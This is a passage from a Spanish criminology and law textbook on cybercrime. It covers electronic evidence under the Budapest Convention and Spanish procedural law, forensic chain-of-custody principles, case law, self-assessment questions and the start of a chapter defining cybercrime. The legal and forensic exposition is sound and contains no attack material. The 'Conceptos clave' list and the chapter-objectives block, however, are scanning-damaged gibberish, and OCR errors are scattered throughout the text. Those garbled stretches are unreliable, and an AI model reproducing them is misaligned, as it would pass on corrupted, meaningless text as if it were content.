ofertar la posibilidad de almacenado permanentemente de datos personales


en servidores alojados en Internet. En estos supuestos, hay que distinguir en-
tre los casos en los que el acceso a datos almacenados en la nube no está res-
tringido desde el dispositivo físico aprehendido en poder del investigado; y
aquellos otros, en los que se encuentra bloqueado el acceso por contraseña o
sistema de cifrado. Para los primeros, el registro podría extenderse a la infor-
mación que se almacena en los servidores externos si media autorización ju-
dicial, mientras que para los segundos habría de recabarse la ayuda del pro-
pio investigado o de los prestadores del servicio (FERNÁNDEZRooRíGUEZ, 2019).

4. Tratamiento legal de la prueba electrónica

4.1 . Principios establecidos a nivel internacional


La Sección 2 del Convenio de Budapest, celebrado el 23 de noviembre en
2001 bajo el auspicio del Consejo de Europa, introduce las garantías mínimas
para el tratamiento, obtención e incorporación a un procedimiento de las prue-
bas electrónicas (PÉREZ GIL, 2003) : establece la necesidad de incorporar en las
leyes de los Estados miembros la posibilidad de que la información conteni-
da en formato digital, o en cualquier formato electrónico, pueda ser utilizada
como prueba ante un tribunal en un juicio penal, independientemente de la ín-
dole del delito que se esté juzgando, cometido por medio de un sistema infor-
mático o a las pruebas que se encuentren en formato electrónico.
De esta manera, la normativa europea determina las condiciones y sal-
vaguardias comunes aplicables a todas las facultades procesales y establece
los siguientes poderes procesales: conservación rápida de datos informáticos
almacenados; conservación y revelación parcial rápidas de los datos relati-
vos al tráfico; la orden de presentación; el registro y la confiscación de datos
informáticos almacenados; la obtención en tiempo real de datos relativos al
tráfico; y la interceptación de datos relativos al contenido.

4.2. Regulación en España


El principal problema del tratamiento de la prueba electrónica es la po-
sible afectación de los derechos fundamentales de los investigados (DELGADO
MARríN, 2013; PoRTALMANRUBIA, 2013; VELAsco NUÑEz, 2006). Fundamentalmente,
podrán verse vulnerados: el derecho a la intimidad personal (art. 18 CE) , (ALCA-
CER GmRAo, 2012) el secreto a las comunicaciones (art. 18.3 CE), el derecho a la
inviolabilidad domiciliaria (art. 18.2 CE) cuando el dispositivo se encuentre en

- 132 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD RELACIONADA CON LAS TIC

el domicilio del investigado; e, incluso, derecho a la autodeterminación infor-


mativa en el ámbito de la protección de datos personales (art. 18.4 CE).
Ej. 3.31: Existen n umerosos ejemplos en nuestra jurisprudencia sobre
las vulneraciones que pueden cometerse mediante la obtención de una prue-
ba electrónica: la STC, de 5 ele noviembre de 2007, consideró que el acceso a
los registros de llamadas memorizadas en el teléfono móvil del detenido, sin
contar con el consentimiento de este ni con autorización judicial, vulneraba el
secreto a las comunicaciones (también STC 115/2013 y SSTS 156/2008, de 8
de abril y 465/2010, de 13 de mayo); también en el caso de acceso a los SMS de
un móvil sin consentimiento del titular (STS 51/2010, de 5 de febrero) . La STS
de 16 de junio de 2014 excluye los mensajes que, una vez recibidos y abiertos
por el usuario, ya no forman parte de la comunicación propiamente dicha del
paraguas de protección constitucional del secreto a las comunicaciones y lo en-
cuadra en el art. 18.4 CE ( protección de datos). En la STC 173/2011, ele 7 de no-
viembre, se planteó la cuestión de si un ordenador podía ser un medio idó neo
para el ejercicio de la intimidad personal, llegando a una conclusión afirmativa 8
e indicando que, en conjunto, los datos de un ordenador "configuran tocios ellos
un perfil altamente descriptivo de la personalidad de su titular". También en la
jurisprudencia del TEDH: la STEDH, de 2 de agosto de 1982 del denominado
Caso Malone o la STEDH, de 22 de mayo de 2008 (caso Iliya Stefanov contra Bul-
garia). Sin embargo, una investigación criminal podrá restringir dicho derecho
fundamenta l cuando los ciudadanos conozcan previamente las circunstancias y
condiciones en las que puede realizarse dicha injerencia, en este aspecto incide
la STEDH del caso Ha ll ford contra Reino Unido, de 25 de junio de 1997.

Toda medida de investigación tecnológica o medio de prueba obtenido


con vulneración de los derechos fundamentales de los investigados se con-
vierten en prueba ilícita y, conforme a la doctrina de los frutos del árbol enve-
nenado, toda prueba electrónica que descienda de ellas también se conside-
rará nula (STS 16/2014, de 30 enero; OLIVA LEóN, 2016).
Para evitar la quiebra de estos derechos reconocidos constitucional-
mente, será preciso establecer un adecuado protocolo de manejo, procesado
y custodia de los datos y dispositivos en los que se encuentren almacenados,
así como unas garantías legales y judiciales.
En referencia a lo primero, desde el campo de la informática forense se
ha propuesto el seguimiento de algunos principios básicos (CANO, 2006):

8 Se ha exceptuado la especial garantía procesal y la vulneración del derecho cons-


titucionalmente reconocido a la intimidad en aquellos supuestos en los que el ordenador no
contenga datos personales (STS, de 5 de junio de 2009).

- 133 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

• Esterilidad de los medios informáticos: verificación de su no modifica-


ción o contaminación.
Ej. 3.32: Comprobar que no hayan sido expuestos a variaciones magnéti-
cas, ópticas (láser), manipulación de datos por vía remota, etc.

• Verificación de las copias: las copias en medios informáticos deben


ser idénticas al original del cual fueron tomadas. Se deberá realizar
una copia de la información salvaguardando el original ( extracción
o "volcado" 9 ). De este modo, será posible conocer, en el momento de
la intervención judicial, el contenido real del ordenador intervenido
(RAYÓN BALLESTEROS et GóMEZ HERNÁNDEZ, 2014; VELASCO NUÑEZ, 2010).
• Documentación de los procedimientos, herramientas y resultados: la
responsabilidad de la custodia de la prueba digital recae en los peri-
tos informáticos mientras esta se encuentre en su poder (RAYóN BA-
LLESTEROS et GóMEZ HERNÁNDEZ, 2014; .ANGUAS BALSERA, 2010).
• Mantenimiento de la cadena de custodia de las evidencias digitales:
concatenado con lo anterior, se exige una diligencia y formalidad es-
peciales para documentar cada uno de los eventos que se han reali-
zado durante el procesamiento de la prueba electrónica.
La ruptura de la cadena de custodia puede provocar la nulidad de la
prueba si ha existido alteración o manipulación de los elementos analizados
(MEsTRE DELGADO, 2015; RAYóN BALLESTEROS & GóMEZ HERNÁNDEZ, 2014; VELASCO Nu-
ÑEZ, 2010).
Ej. 3.33: La importancia del mantenimiento de la cadena de custodia que-
da reflejada en nuestra jurisprudencia. La STC, de 29 de septiembre de 2003,
declaró la nulidad de una prueba electrónica porque los soportes informáticos
incautados no fueron clasificados ni relacionados (también AAP Vizcaya, de 31
de marzo de 2008; SJP nºl Avilés, de 7 de junio de 2011) . La SAP Pontevedra,
de 18 de junio de 2009, declaró que no podía tenerse como probado que uno de
los discos duros objeto del informe pericial fuera realmente el disco duro del
ordenador intervenido, porque no aparecía convenientemente documentado
por su marca y número de serie, en el acta de registro de la vivienda del acusado
(también en la SAP Cuenca, de 16 de noviembre de 2010, que también alude a
la falta de documentación del sistema utilizado para el volcado de datos). Por

9 El volcado consiste en el traspaso de datos originales en un formato apto para ser


tratado por la herramienta de análisis que se vaya a utilizar. El clonado, por otra parte, supone
realizar una copia exacta, bit a bit, del original. En conjunto ambas operaciones suponen el du-
plicado del dispositivo original y su contenido, técnica conocida como imaging.

- 134 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALI DAD RE LACIONADA CON LAS TIC

el contrario, no se considera una ruptura de la cadena de custodia de la prueba


electrónica: el merco cambio de lugar de los elementos custodiados (SAP Ma-
drid, de 9 de diciembre de 2008 ); la falta de visibilidad de los sellos del Juzgado
que cierran un sobre que contiene dispositivos informáticos incautados (STS,
de 5 de diciembre de 2012); la falta de presencia de los aboga dos defensores
en el acto ele clonado de discos duros requisados (SAP Sevilla, 21 noviembre
d 2006) ; la entrega a los peritos del clonado de los datos en un ordenador o
cualquier otro soporte de almacenamiento, sin la intervenc ión del Letrado de la
Administración de Justicia (SSTS 1599 /1999 de 15 de noviembre, 256/2008 de
14 de mayo y 480/2009 de 22 de mayo) .

• Informe y presentación de resultados de los análisis (informe pericial):


las conclusiones de los peritos informáticos deben recogerse en un
informe que se presentará ante la autoridad judicial.
Ej. 3.34: Como índica VELAsco NuÑEZ (2010), la tipología de perit:ias a rea-
lizar sobre los elementos intervenidos depende ele las necesidades probatorias
de los hel'.hos investigados, pudiendo constituir su objeto, por ejemplo: las se-
ñas lP (procedencia del ataque informático) : el autor, por su origen; el rastro del
dinero o del intercambio (el archivo): el autor, por su destino; el intercambio
y los intermediarios: proxys, botnets, etc.; el origen del virus troyano : quién lo
introduce, de dónde viene, a quién envía info r mac ión, etc.; el análisis de las te-
lecomunicaciones (interlocuto res, fechas, duración, localización); desaparición
del cuerpo del delito y medios empleados para hal'.erlo: el borrado, o la denega-
ción intencionada de servicio (DDoS) .

• Administración del caso realizado: se recomienda un tiempo de cus-


todia temporal de los datos, así como un sistema automatizado de
documentación de expedientes de los casos, con una adecuada cuota
de seguridad y control.
• Auditoría de los procedimientos realizados en la investigación: ejerci-
cio posterior de autoevaluación de los procedimientos (protocolos y
buenas prácticas).
Para garantizar todos estos principios y evitar esta alteración de la evi-
dencia original o la ruptura de la cadena de custodia, es frecuente el uso de
protocolos de operación preestablecidos.
Ej. 3.35: Como es el caso del Manual de Normas de Procedimiento existente
en España, en el que se concretan todas las operaciones ele cada proceso, unifica
y sistematiza el tratamiento de las evidencias, o la Norma UNE 71506, relativa a la
metodología para el análisis forense ele las evidencias elel'.trónicas, de julio de 2013
elaborado por la Asociación Española de Normalización y Certificación (AENOR).

- 135 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

A pesar de la necesidad de férreas garantías, la regulación de la prue-


ba electrónica en nuestro Derecho procesal es relativamente reciente. Tras
la reiterada denuncia de los sectores doctrinales y la crítica de las resolucio-
nes jurisprudenciales del TS, la LO 13/2015, de 5 de octubre, de modificación
de la Ley de Enjuiciamiento Criminal, para el fortalecimiento de las garantías
procesales y la regulación de las medidas de investigación tecnológica, incor-
poró finalmente las medidas de investigación tecnológicas y unos "principios
rectores" para garantizar la no vulneración de los derechos fundamentales
de los investigados. La Ley de Enjuiciamiento criminal (LECrim) (arts. 588
bis.a y siguientes), contiene las disposiciones comunes a la interceptación de
las comunicaciones telefónicas y telemáticas, la captación y grabación de co-
municaciones orales mediante la utilización de dispositivos electrónicos, la
utilización de dispositivos técnicos de seguimiento, localización y captación
de la imagen, el registro de dispositivos de almacenamiento masivo de infor-
mación y los registros remotos sobre equipos informáticos.
Según expone la precitada norma, la prueba electrónica en el proceso
penal estará sometida a los principios de especialidad, idoneidad, excepcio-
nalidad, necesidad y proporcionalidad de la medida.
• El principio de especialidad exige que una medida esté relacionada
con la investigación de un delito concreto. No podrán autorizarse
medidas de investigación tecnológica que tengan por objeto preve-
nir o descubrir delitos o despejar sospechas sin base objetiva (STC
253/2006, de 11 de septiembre).
• El principio de idoneidad servirá para definir el ámbito objetivo y
subjetivo y la duración de la medida en virtud de su utilidad.
• Los principios de excepcionalidad y necesidad indican que solo podrá
acordarse la medida:
a) Cuando no estén a disposición de la investigación, en atención a
sus características, otras medidas menos gravosas para los de-
rechos fundamentales del investigado o encausado e igualmente
útiles para el esclarecimiento del hecho;
b) Cuando el descubrimiento o la comprobación del hecho investi-
gado, la determinación de su autor o autores, la averiguación de
su paradero, o la localización de los efectos del delito se vea gra-
vemente dificultada sin el recurso a esta medida.
• Finalmente, se entenderá que una medida de investigación tecnológica
cumple con el principio de proporcionalidad cuando, tomadas en consi-
deración todas las circunstancias del caso, el sacrificio de los derechos
e intereses afectados no sea superior al beneficio que de su adopción

- 136 -
Capítulo 3. PARTICULARIDADES DE LA CRIMINALIDAD RELACIONADA CON LAS TIC

resulte para el interés público y de terceros. Para la ponderación de los


intereses en conflicto, la valoración del interés público se basará en la
gravedad del hecho, su trascendencia social o el ámbito tecnológico de
producción, la intensidad de los indicios existentes y la relevancia del
resultado perseguido con la restricción del derecho.
Siempre será preceptiva, salvo casos en que se aprecie un interés consti-
tucional legítimo que haga imprescindible la medida, la pertinente autoriza-
ción judicial para proceder a la investigación tecnológica.
Aunque en el pasado nuestra jurisprudencia entendió que los meros actos o
diligencias de investigación realizados por la policía no se consideraban medios de
prueba y, por tanto, pueden prescindir en algunos supuestos de autorización ju-
dicial (Dotz LAGO & FIGUEROA NAVARRO ET AL, 2012; FERNANDEZ RooERA, 2015) en casos
de rastreos informáticos para la obtención del IP y el IMSI (así, por ejemplo, SSTS
55/2007, de 23 de enero 236/2008, de 9 de mayo; 249 /2008, de 20 de mayo; en
contra, STS 130/2007, de 19 de febrero), hoy ya no es así en todos los casos citados.
Hay que tener en cuenta que una cosa es que realizar un rastreo de una IP como acto
de investigación, información que es pública y puede ser efectuada por cualquier
usuario, no requiera de autorización judicial y, otra muy diferente, es que se exija
autorización judicial para que los distribuidores del servicio de telecomunicaciones
den el número asociado al IMSI, pues ese dato ya afecta al secreto de las comunica-
ciones (STS 880/2009, de 7 de julio). A partir de la promulgación de la Ley 25/2007,
de 18 de octubre, de conservación de datos relativos a las comunicaciones electróni-
cas y redes públicas de comunicación se exige la autorización judicial para obtener
los datos asociados a una IP de ordenador (STS 247 /2010, de 18 de marzo). Actual-
mente, el art. 588 ter.k LECrim dispone que si en el ejercicio de las funciones de pre-
vención y descubrimiento de los delitos cometidos en Internet, los agentes tuvieran
acceso a una dirección 1P que estuviera siendo utilizada para la comisión de algún
delito y no constara la identificación y localización del equipo o del dispositivo de
conectividad correspondiente, ni los datos de identificación personal del usuario,
solicitarán del juez de instrucción que requiera de los agentes sujetos al deber de
colaboración, la cesión de los datos que permitan la identificación y localización del
terminal o del dispositivo de conectividad y la identificación del sospechoso.

En cuanto a la interceptación de las comunicaciones telefónicas y te-


lemáticas, la LECrim (arts. 588 ter.a y siguientes) establece la necesidad de
autorización judicial, que solo podrá ser concedida cuando la investigación
tenga por objeto delitos dolosos castigados con pena con límite máximo de,
al menos, tres años de prisión, delitos cometidos en el seno de un grupo u
organización criminal y delitos de terrorismo o, específicamente, delitos co-
metidos a través de instrumentos informáticos o de cualquier otra tecnología
de la información o la comunicación o servicio de comunicación.
La ley exige además que los terminales o medios de comunicación objeto de
intervención sean los que habitual u ocasionalmente utilice el investigado. Tam-

- 137 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

bién podrán intervenirse los terminales o medios de comunicación de la víctima


cuando sea previsible un grave riesgo para su vida o integridad. Incluso, podrá
acordarse la intervención de las comunicaciones emitidas desde terminales o
medios de comunicación telemática pertenecientes a una tercera persona, siem-
pre que exista constancia de que el sujeto investigado se sirve de ellos para trans-
mitir o recibir información, o el titular colabore con la persona investigada en sus
fines ilícitos o se beneficie de su actividad. Finalmente, podrá autorizarse dicha
intervención cuando el dispositivo objeto de investigación sea utilizado malicio-
samente por terceros por vía telemática, sin conocimiento de su titular.
Los prestadores de servicios de telecomunicación y cualquier persona que
facilite la comunicación a través de cualquier medio de comunicación telemática
están obligados a prestar ayuda a la Administración de Justicia para facilitar la
intervención de las comunicaciones Los datos electrónicos de tráfico o asociados
podrán ser incorporados al proceso penal por los prestadores de servicios o per-
sonas que faciliten la comunicación conforme a este deber de colaboración.
La LECrirn regula también el registro de dispositivos de almacenamiento
masivo de información cuando, en el curso de una investigación, se requiera la
aprehensión de ordenadores, instrumentos de comunicación telefónica o tele-
mática o dispositivos de almacenamiento masivo de información digital o el ac-
ceso a repositorios telemáticos de datos. Para tal intervención se requerirá de
una motivación y justificación individualizada en la resolución judicial, pues la
mera incautación de los soportes mismos no legitima el acceso a su contenido.
En la LECrirn (arts. 588 septíes.a y siguientes) se regula también la utiliza-
ción de datos de identificación (datos de tráfico) y códigos, así corno la instala-
ción de un software, que permitan, de forma remota y telemática, el examen a
distancia y sin conocimiento de su titular o usuario del contenido digital de un
soporte electrónico (acceso y registro remoto o remate search) para la investiga-
ción de delitos cometidos en el seno de organizaciones criminales, de terrorismo,
cometidos contra menores o incapaces, contra la Constitución, de traición y re-
lativos a la defensa nacional, cometidos a través de instrumentos informáticos
y de cualquier otra tecnología de la información, telecomunicación o servicio de
comunicación. Para todo ello es preceptiva la autorización judicial.

5. La presentación de la prueba en el proceso. Problemas


adicionales

En ocasiones, es posible que el contenido de la prueba electrónica se impri-


ma en soporte papel, y se incorpore al proceso mediante un documento impreso,
siendo plenamente de aplicación el régimen jurídico de la prueba documental

- 138 -
Capítulo 3. PARTICULARJDADES DE LA CRIMINALIDAD RELACIONADA CON LAS TIC

(STS 300/2015, de 19 de mayo; DELGADO MARTtN, 2016 y 2017). El uso de copias


impresas debe estar encaminado a facilitar la lectura de los datos en sede judicial
y su posterior valoración, pero es recomendable que sea acompañado en todo
caso por el documento electrónico correspondiente. Ello se debe a que, en el caso
de documentos electrónicos es posible verificar el hash, una cadena alfanumérica
hexadecimal generada a partir de la aplicación de un algoritmo que debe identifi-
car de manera inequívoca dicho documento, de tal manera que el menor cambio
realizado sobre el mismo será rápidamente detectado. De este modo, gracias a las
funciones criptográficas hash es posible asegurar la integridad de una comunica-
ción verificando si ha sido alterada de alguna forma: examinando los hash crea-
dos antes y después de la transmisión de los datos. Si los dos hash son idénticos,
significa que no ha habido ninguna alteración. Por otra parte, los hash también
sirven para certificar que la copia de un documento electrónico se corresponde
fielmente con el original. Además de ello, en la prueba electrónica debe otorgarse
importancia a los datos no visuales -la llamada información invisible del ámbito
digital-, gran cantidad de información asociada a los documentos electrónicos
que se pierde en la impresión, y que puede ayudar en la valoración de la eviden-
cia (CARRASCO MAYANS, 2016).
Ej. 3.35: Si nos limitamos a obtener una captura de pantalla de una determi-
nada aplicación, lo que obtenemos es únicamente aquello que el desarrollador ha
decidido exteriorizar. Esta reducción a una imagen o a un texto impreso, puede
suponer la pérdida de importante información que, potencialmente, puede su-
poner una merma de valor probatorio ante la impugnación de la otra parte. Por
ejemplo, en el caso de un correo electrónico un pantallazo puede reflejar el remi-
tente, el destinatario, la fecha y el asunto con el que se ha enviado, pero no contie-
ne información sobre la lP desde la que se ha remitido, ni sobre la integridad del
acto de comunicación (modificaciones en tránsito o una vez recibido) .

Sin embargo, lo cierto es que nuestra jurisprudencia suele admitir sin


ambages la prueba electrónica en formatos no originales (impresos, panta-
llazos), por cuestiones de celeridad procesal y siempre que estos no sean im-
pugnados por la parte contraria.
La STS n.º 300/2015, de 19 de mayo indica que cualquier persona podría crear
pruebas electrónicas falsas ad hoc para guiar un fallo a su favor, más aún cuando la
misma se puede capturar mediante un pantallazo e incorporarlo como una imagen
digital fija y que se puede incorporar a la causa como documento digitalizado o in-
cluso en papel impreso, instando a que si alguna de las partes aporta conversacio-
nes electrónicas en estas vías, la contraparte proceda a su impugnación desplazan-
do la carga de la prueba hacia la parte proponente de dicho material probatorio.
Pero lo cierto es que la jurisprudencia ha admitido los pantallazos sin dictamen pe-
ricial como prueba en diferentes procesos (BuENo D E MATA, 2015).

- 139 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

CONCEPTOS CLAVE

extim;t~ad, · :ef1; j1.1rídíco1d~~ o reputl'.lf iO.-


ta.s, lntelige ervictimologia~teoria. d~ ·las
s, teqda del ~ctor-~edrorever;ición.¡ c.ifra negra, preyalen-
tente; victimi.zación, m\iitiple, macro-vjctiJUiiación, prÚe- ,
;, ~~ .· r,im{9.ál,-hac]<e1:,:·ctacke-¡:.5jñf~J..'ql~1tfP. foreni~ \llÍOr,Jlla~Jóff ,·
invist e, c1 er.crinünológia,
.,_ ,, .,.
teoría de la fránsición ,,,espacial, ciberbanda,
'."/', : ~ '
ha-
ck ·Modelo Est de Ciber TAC, e,s · · · · · · e,
i" c,ode~ri .e_r,s, : · · ª• ,,
cibermula
1:f"

EJERCICIOS DE AUTO EVALUACIÓN


l. Describa el proceso de génesis de un ciberdelito conforme a la teoría de la tras-
lación espacial aplicado a un supuesto real.
2. ¿Qué es el estilo de vida digital? ¿Qué repercusión tiene en la producción de
cibercrímenes?
3. ¿Cuáles son los principales factores de riesgo asociados a la génesis de la ciber-
delincuencia?
4. Explique la diferencia entre hacker y ciberdelincuente.
5. ¿Qué garantías y salvaguardas son necesarios a la hora de autorizar y presentar
una prueba electrónica en un proceso penal?
6. ¿Es posible concretar un perfil único de cibercriminal? Motive su respuesta.
7. ¿Cuáles son los factores que explican que la víctima adquiera un papel prepon-
derante en la explicación y la prevención de los delitos en el ciberespacio?
8. Ponga un ejemplo de revictimización latente diferente a los mostrados en el tex-
to.
9. ¿En qué se diferencian la victimización múltiple y la macro-victimización?
10. ¿Qué tipos de prueba electrónica existen? Ponga un ejemplo de cada uno de
ellos.

- 140 -
Capítulo 4
El cibercrimen.
Definición, clasyicaeión y marco legislativo
OBJETIVOS DEL CAPÍTULO
~1. :r .,.."i"'

-cápítulo
"
analizar
t ~
<.:n~lÓg'fas
·, -,, . ·:·
de'la
' '
in~
Únicación han crea íghos de protecdó
po-han abiertó layu~ _ < _ a,i,:a intereses pre
g que'ho soló itifi la en
enída los siste
s ora''.~"'de protección
~,,.. " .
e.J ambién lo,son
~x:·"4' . . '
la
. '
,;>

se n a . . ispósitivos ínfor aos; de los sistem,a


com'.u~í - nes -y: de.las ,r,ropiás cpmuni . Q bienes'jurídícos ~ .

~
. tivos'a
, , • .
stó's: T~m •
e expÍicari~J
,. 7-
,,.1 .
encía
_,·,
del> '
término ciberétl
frente . o informát aremos :un concepto de lo qúe yamos "a· ente
. por:db ei{ englo · tant0 los .cibercrínieries en s~nfido estricto '
en.sentido amplio, los distinguiremos de otros ciberilfcitos y propondrem
versas cla~íficaéión cibei_-qelitps en atención al' bien jÚrídicQ p:r~t
a la intenciona1idad utores o ásu relación con el medio ínformá
seg'l;J,'p.da -~ arte d;i' cap u o tenélfá como, <ibjeto describir el marco"no:
que, desde 'el ámbito internacional, ·europeo· y nacional, reg~laJas activi '
al
ilícita$ él!' el ciber~s~á.do, éifléndono's''t~nto orM'h perial com"o .al admini
tivo, este último-ffi la medida en que ~ea imJ?fescindible para·la formación
ctor. A eohtinuación, p:i;ópondremos u n esquema;del repertorio de ciberde
s contemplados en _el vigente Derecho penal interno, adoptando un mod_
ntégra,dÓt que ~nglq,_b a tanto los ciber:,delitos _e n sentido estriétb_coriw en se
ddo ampÍio, abofdlmdo el trátamiénto particul~rízadp de algunos d~ ellos en
, . C3;Pí~l ' os / on ·Qna breve exposición sobre los corriplej
Rroble de la legislación y la jurisdicción plantean
_~n l¡;t,a
I. INTRODUCCIÓN. LA RELEVANCIA PENAL DE LAS NUEVAS TECNOLOGÍAS

El ámbito de estudio al que se extiende esta obra está relacionado con


la seguridad de la información y las comunicaciones, pero a su vez es preciso
poner de manifiesto que tanto la una como las otras pueden afectar a muy
distintos bienes jurídicos. En este sentido, distinguiremos aquellos aspectos
que se centran en la seguridad de los propios sistemas de información y co-
municación, su contenido y sus funciones, como objetos de protección en sí
mismos, y aquellos otros en los que, en cambio, las tecnologías de la informa-
ción y la comunicación se convierten en objeto de atención en tanto pueden
ser utilizadas como medios de ataque a otros bienes jurídicos.
En el primer aspecto debemos reflexionar sobre cómo han cambiado las
tecnologías de la información y la comunicación (las llamadas TIC) las ne-
cesidades y posibilidades de protección del conocimiento. En una sociedad
en la que el conocimiento es un valor cada vez más preciado, tanto para el
funcionamiento de las organizaciones (Estados, empresas, etc.) como para la
realización de los individuos, las nuevas tecnologías han supuesto un salto
cualitativo espectacular, una verdadera revolución, en tanto nos posibilitan
una recopilación, almacenamiento y procesamiento masivo de datos y su
transformación en información a través de complejos procesos de contextua-
lización, categorización, cálculo, corrección o condensación.
Pero la cosa no queda ahí. Gracias a las TIC y sobre todo a la creación de
Internet, los datos, la información y el conocimiento además viajan, se mue-
ven por un espacio comunicativo e interactivo virtual, que conocemos como
el ciberespacio, y que ha modificado para siempre las relaciones económicas,
políticas y sociales a nivel planetario. Resulta evidente que ante esta nueva

- 143 -
Cibercriminalidad.
S gunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

realidad las posibles formas de ataque a la información y las consiguientes


necesidades de protección han cambiado notablemente.
Ej. 4.1: En 1968, cuando se promulgó la ley de Secretos Oficiales, se intentó
ante todo proteger la confidencialidad de la información. Para ello se estable-
cieron unos mecanismos de seguridad que básicamente consistían en mante-
nerla dentro de una caja fuerte o dentro de una sala acorazada con unas rejas
y un policía que custodiaba la entrada. Cuando una persona quería acceder a la
información se comprobaba si estaba autorizada mediante un proceso de iden-
tificación que incluía la solicitud de su documento de identidad y el documento
de autorización de acceso a la info rmación. Si todo era correcto se permitía el
acceso. Si la información estaba cifrada se obtenían las claves de la propia caja
fuerte y se descifraban mediante el procedimiento oportuno. La persona que
accedía a la información comprobaba que el documento era auténtico mediante
la comprobación de la firma y el sello de la autoridad. Comprobando la corre-
lación en el número de páginas y que no exisúan borrones se aseguraba de su
integridad. Además, debía asegurarse de que el documento estaba en vigo1~ ya
que la validez de la información podía caduca1; mirando la fecha y hora del do-
cumento o sello de tiempo. Si todo eso era correcto y leía la información o saca-
ba una copia se registraba en un libro en el que firmaban tanto el que accedía a
la información como el que la proporcionaba. De esta manera ni el originador, ni
el que leía o copiaba la información, ni quien daba el acceso podían negar su co-
rrespondiente intervención en el hecho - no repudio-. Por último, las medidas
de la sala eran tales que siempre había un policía con las llaves para acceder a la
información y así mismo se protegía la información ante un fuego u otro posible
desastre de úpo físico, lo que aseguraba su disponibilidad.

Los principios básicos del proceso de seguridad de la información siguen


siendo hoy los mismos que entonces: la confidencialidad, la integridad de la
información y su disponibilidad. O, en su versión ampliada (ENS) además la
autenticidad y la trazabilidad. Pero las nuevas formas de recopilar, almacenar
y comunicar datos e información han hecho, como vimos en los capítulos an-
teriores, que varíen sustancialmente las vulnerabilidades de los sistemas de
información, las amenazas y formas de ataque a los mismos y, en consecuen-
cia, también las estrategias de respuesta al riesgo.
A este aspecto relacionado con la protección de los sistemas de informa-
ción, su contenido y sus funciones, y en especial con la protección penal de los
mismos, dedicaremos la mayor parte de esta obra.
Pero la temática de la cibercriminalidad abarca también, como ya se ha
anunciado, todos aquellos ataques a bienes jurídicos tradicionales realizados
en el ciberespacio, a través de las TIC. Y ello es así porque hoy en día, y muy

- 144 -
Capítulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFICACIÓN YMA RCO LEGISLATIVO

especialmente desde la creación de Internet, las TIC tienen un enorme impac-


to en la vida de las personas.
En efecto, las TIC han supuesto un cambio radical también para los indi-
viduos, modificando nuestros hábitos y formas de trabajar, de consumir, de
comunicarnos o de relacionarnos. Las nuevas tecnologías han adquirido un
rol esencial en nuestras actividades de tipo lúdico, cultural, comercial, finan-
ciero ... Los cambios más evidentes son sin duda los producidos en el ámbito
social; las posibilidades de comunicarnos en tiempo real por medio de men-
sajes de texto, audio, imagen y las redes sociales son aspectos de gran rele-
vancia y de una enorme e indiscutible utilidad social. Pero la comunicación
directa entre un gran número de personas conocidas o desconocidas es solo
un aspecto del fenómeno de globalización. Otro es la facilidad de acceso a la
información. Traductores, noticias, lecciones en YouTube , música, juegos, ar-
tículos científicos, instrucciones y servicios de todo tipo, desde compras y re-
servas (e-commerce) hasta transacciones bancarias (home-banking), gestión
empresarial (e-management) trámites con la administración, etc., se pueden
obtener cómodamente desde el propio ordenador y en segundos.
No obstante, estas incuestionables ventajas van acompañadas de as-
pectos negativos: las TIC nos han acostumbrado a un acceso inmediato y sin
restricciones a un universo de productos y servicios, lo que fomenta una im-
paciencia e impulsividad poco aconsejables para la protección de los bienes
jurídicos que, en su utilización, y en muchas ocasiones incluso sin saberlo,
exponemos.
En otros casos no se trata tanto de nuestra impulsividad a la hora de
conseguir una aplicación, o un producto, sino de que la modernización de los
elementos básicos de comunicación y soporte de la información nos ata irre-
mediablemente, en pro de la eficacia de un servicio, a las nuevas tecnologías.
Y así asistimos, por ejemplo, sin poder escapar a ello, a la informatización de
las Administraciones públicas y de las relaciones con el administrado (la Ad-
ministración electrónica).
Pero a las enormes posibilidades tecnológicas de acceso y difusión de la
información que ofrecen las TIC se añade otro fenómeno que contribuye no-
tablemente a su potencialidad criminógena: la falta de una cultura de la pri-
vacidad, que ha venido potenciada, precisamente, por las nuevas tecnologías.
Las redes sociales han favorecido un cambio social radical en relación con el
valor de la intimidad y la propia imagen, con la necesidad de reconocimien-
to y el sentido de pertenencia a un grupo. Toda una generación ha crecido
ya acostumbrada a exponer su imagen, sus opiniones y los acontecimientos
de su vida al escrutinio público y muchos de nuestros jóvenes han desarro-

- 145 -
Cibercriminalidad.
Segunda parte. ASP C'l'OS PENALES YCRIMlNOLÓGICOS DE LA CRIMlNALIDAD RELACIONADA CON LAS TIC.

Hado un n cesidad vital de obtener el beneplácito incluso de observadores


descono idos en forma de "líke". Este fenómeno nos sitúa ante un cambio de
p r digma que algunos expertos han denominado la "era de la extimidad".
El término extimidad es tomado por el psicólogo y psiquiatra Serge T1ssERON
del filósofo Jacques LAcAN (quien lo elaboró con un contenido diferente) para
explicar "el movimiento que empuja a cada cual a mostrar una parte de su
vida íntima, tanto física como psíquica". El proceso de extimidad consiste, se-
gún T1ssERON (2011), en mostrar algunas partes de uno mismo que hasta ese
momento habían permanecido en secreto, para que otras personas las aprue-
ben, con el objetivo de construir una autoestima más fuerte, así como víncu-
los sociales más ricos.
Las redes sociales no solo hacen acopio de las fotografías, opiniones e
información suministrada voluntariamente por los usuarios, sino que datos
antes considerados privados y altamente sensibles, como la religión, orienta-
ción sexual, ideología política, hábitos de consumo, etc., pueden ser averigua-
dos con gran precisión de forma automática por la aplicación y trasmitidos a
terceros.
Ej. 4.2: Por resolución de 21 de agosto de 2017 la Agencia Española ele
Protección de Datos (AEPD) sancionó a Facebook con una multa de 1.200.000
euros por vulnerar la normativa sobre protección de datos personales de los
usuarios, tras constatarse que la red social recopilaba y almacenaba informa-
ción sobre la vida o la orientación sexual. las creencias, la ideología, la salud,
